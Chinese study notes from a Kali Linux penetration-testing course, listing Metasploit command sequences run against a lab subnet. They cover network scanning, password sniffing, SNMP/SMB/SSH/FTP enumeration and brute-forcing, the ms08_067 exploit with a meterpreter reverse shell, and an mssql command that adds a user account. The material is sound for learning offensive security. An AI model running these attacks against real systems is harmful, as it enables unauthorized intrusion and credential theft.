本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
模块位置:
信息收集的模块都在 auxiliary/scanner/ 之下
msf > use auxiliary/scanner/ [TAB] Display all 531 possibilities? (y or n)
1. db_nmap
跟 nmap 用法一样,结果存放在 msf 的数据库中
msf > db_nmap -sV 10.10.10.0/24
auxiliary 目录下
RHOSTS <> RHOST
- 192.168.1.20-192.168.1.30、192.168.1.0/24,192.168.11.0/24
- 也可以编写地址列表:file:/root/h.txt
2. 主机发现扫描
- use auxiliary/scanner/discovery/arp_sweep
set INTERFACE、RHOSTS、SHOST、SMAC、THREADS;run
msf > search arp msf > use auxiliary/scanner/discovery/arp_sweep msf auxiliary(scanner/discovery/arp_sweep) > show options msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 10.10.10.0/24 msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0 msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20 msf auxiliary(scanner/discovery/arp_sweep) > run
3. 端口扫描
- use auxiliary/scanner/portscan/syn
set INTERFACE、PORTS、RHOSTS、THREADS;run
msf > search portscan msf > use auxiliary/scanner/portscan/syn msf auxiliary(scanner/portscan/syn) > show options msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0 msf auxiliary(scanner/portscan/syn) > set PORTS 80 msf auxiliary(scanner/portscan/syn) > set RHOSTS 10.10.10.0/24 msf auxiliary(scanner/portscan/syn) > set THREADS 50 msf auxiliary(scanner/portscan/syn) > run
4. 僵尸扫描
查找 ipidseq 主机(查找僵尸机)
- use auxiliary/scanner/ip/ipidseq
- set RHOSTS 192.168.1.0/24 ;run
nmap -PN -sI 10.10.10.147 10.10.10.132
msf > use auxiliary/scanner/ip/ipidseq msf auxiliary(scanner/ip/ipidseq) > show options msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 10.10.10.100-150 msf auxiliary(scanner/ip/ipidseq) > set THREADS 20 msf auxiliary(scanner/ip/ipidseq) > run
msf > db_nmap -PN -sI 10.10.10.147 10.10.10.132
5. UDP 扫描
- use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe
msf > use auxiliary/scanner/discovery/udp_sweep msf auxiliary(scanner/discovery/udp_sweep) > show options msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.10.10.100-150 msf auxiliary(scanner/discovery/udp_sweep) > run
msf > use auxiliary/scanner/discovery/udp_probe msf auxiliary(scanner/discovery/udp_probe) > show options msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.10.10.100-150 msf auxiliary(scanner/discovery/udp_probe) > set CHOST 10.10.10.131 msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20 msf auxiliary(scanner/discovery/udp_probe) > run
6. 密码嗅探
- use auxiliary/sniffer/psnuffle
- 支持从 pacap 抓包文件中提取密码
- 功能类似于 dsniff
目前只支持 pop3、imap、ftp、HTTP GET 协议
msf > search sniffer msf > use auxiliary/sniffer/psnuffle msf auxiliary(sniffer/psnuffle) > show options msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0 msf auxiliary(sniffer/psnuffle) > run
root@kali:~# ftp 10.10.10.148
# 继续上述 msf auxiliary(sniffer/psnuffle) > show options msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng msf auxiliary(sniffer/psnuffle) > jobs msf auxiliary(sniffer/psnuffle) > kill 0 msf auxiliary(sniffer/psnuffle) > run
7. SNMP 扫描
- vim /etc/snmp/snmpd.conf (侦听复制修改为 0.0.0.0:161)
- use auxiliary/scanner/snmp/snmp_login
- use auxiliary/scanner/snmp/snmp_enum
- use auxiliary/scanner/snmp/snmp_enumusers (windows)
use auxiliary/scanner/snmp/snmp_enumshares (windows)
msf > use auxiliary/scanner/snmp/snmp_login msf auxiliary(scanner/snmp/snmp_login) > show options msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 10.10.10.149 msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20 msf auxiliary(scanner/snmp/snmp_login) > run
msf > use auxiliary/scanner/snmp/snmp_enum msf auxiliary(scanner/snmp/snmp_enum) > show options msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.149 msf auxiliary(scanner/snmp/snmp_enum) > run
msf > use auxiliary/scanner/snmp/snmp_enum msf auxiliary(scanner/snmp/snmp_enum) > show options msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.142 (windows) msf auxiliary(scanner/snmp/snmp_enum) > run msf auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY jlcssadmin (SNMP 服务器团体名) msf auxiliary(scanner/snmp/snmp_enum) > set THREADS 20 msf auxiliary(scanner/snmp/snmp_enum) > run
msf > use auxiliary/scanner/snmp/snmp_enumusers msf auxiliary(scanner/snmp/snmp_enumusers) > show options msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 10.10.10.142 msf auxiliary(scanner/snmp/snmp_enumusers) > run
msf > use auxiliary/scanner/snmp/snmp_enumshares msf auxiliary(scanner/snmp/snmp_enumshares) > show options msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 10.10.10.142 msf auxiliary(scanner/snmp/snmp_enumshares) > run
8. SMB 扫描
SMB 版本扫描
- use auxiliary/scanner/smb/smb_version
扫描命令管道。判断 SMB 服务类型(账号、密码)
- use auxiliary/scanner/smb/pipe_auditor
扫描通过 SMB 管道可以访问的 RCERPC 服务
- use auxiliary/scanner/smb/pipe_dcerpc_auditor
SMB 共享账号(账号、密码)
- use auxiliary/scanner/smb/smb_enumshares
SMB 用户枚举(账号、密码)
- use auxiliary/scanner/smb/smb_enumusers
SID 枚举(账号、密码)
- use auxiliary/scanner/smb/smb_lookupsid
SMB 版本扫描
msf > search smb msf > use auxiliary/scanner/smb/smb_version msf auxiliary(scanner/smb/smb_version) > show options msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.147, 10.10.10.148, 10.10.10.142 msf auxiliary(scanner/smb/smb_version) > run
# 继续上述 msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_version) > run
扫描命令管道。判断 SMB 服务类型(账号、密码)
msf > use auxiliary/scanner/smb/pipe_auditor msf auxiliary(scanner/smb/pipe_auditor) > show options msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/pipe_auditor) > run
# 继续上述 msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
扫描通过 SMB 管道可以访问的 RCERPC 服务
msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
# 继续上述 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBUser Administrator msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBPass 123456 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
SMB 共享账号(账号、密码)
msf > use auxiliary/scanner/smb/smb_enumshares msf auxiliary(scanner/smb/smb_enumshares) > show options msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/smb_enumshares) > run
# 继续上述 msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_enumshares) > run
SMB 用户枚举(账号、密码)
msf > use auxiliary/scanner/smb/smb_enumusers msf auxiliary(scanner/smb/smb_enumusers) > show options msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/smb_enumusers) > run
# 继续上述 msf auxiliary(scanner/smb/smb_enumusers) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_enumusers) > run
SID 枚举(账号、密码)
msf > use auxiliary/scanner/smb/smb_lookupsid msf auxiliary(scanner/smb/smb_lookupsid) > show options msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 10.10.10.148
# 继续上述 msf auxiliary(scanner/smb/smb_lookupsid) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_lookupsid) > run
9. SSH 扫描
SSH 版本扫描
- use auxiliary/scanner/ssh/ssh_version
SSH 密码爆破
- use auxiliary/scanner/ssh/ssh_login
- set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt ;set VERBOSE false ;run
- use auxiliary/scanner/ssh/ssh_login
SSH 公钥登陆
- use auxiliary/scanner/ssh/ssh_login_pubkey
- set KEY_FILE id_rsa;set USERNAME root ;run
- use auxiliary/scanner/ssh/ssh_login_pubkey
SSH 版本扫描
msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_version) > run
SSH 密码爆破
root@kali:~# more /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false msf auxiliary(scanner/ssh/ssh_login) > run
SSH 公钥登陆
msf > use auxiliary/scanner/ssh/ssh_login_pubkey msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
10. windows 缺少的补丁
- 基于已经取得的 session 进行检测
use post/windows/gather/enum_patches
- show advanced
- set VERBOSE yes
检查失败
- known bug in WMI query, try migrating to another process
- 迁移到另一个进程再次进行尝试
ms08-067
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.147 msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/smb/ms08_067_netapi) > run
meterpreter > backgroun msf exploit(windows/smb/ms08_067_netapi) > sessions
msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches msf post(windows/gather/enum_patches) > set SESSION 4 msf post(windows/gather/enum_patches) > run
# 进程错误,迁移进程 msf post(windows/gather/enum_patches) > sessions -i 4 meterpreter > getpid meterpreter > ps meterpreter > migrate 828 # spoolsv.exe meterpreter > background msf post(windows/gather/enum_patches) > run
11. mssql 扫描
mssql 扫描端口
- TCP 1422(动态端口)/ UDP 1434 (查询 TCP 端口号)
- use auxiliary/scanner/mssql/mssql_ping
爆破 mssql 密码
- use auxiliary/scanner/mssql/mssql_login
远程执行代码(获取数据库权限之后)
- use auxiliary/admin/mssql/mssql_exec
- set CMD net user user1 pass123 /ADD
mssql 扫描端口
msf > use auxiliary/scanner/mssql/mssql_ping msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 10.10.10.142 msf auxiliary(scanner/mssql/mssql_ping) > run
12. FTP 扫描
ftp 版本扫描
- use auxiliary/scanner/ftp/ftp_version
- use auxiliary/scanner/ftp/anonymous
- use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ [tab]
- Display all 479 possibilities? (y or n)
查询版本信息
msf > use auxiliary/scanner/ftp/ftp_version msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ftp/ftp_version) > run
是否允许匿名登录
msf > use auxiliary/scanner/ftp/anonymous msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ftp/anonymous) > run
暴力破解
use auxiliary/scanner/ftp/ftp_login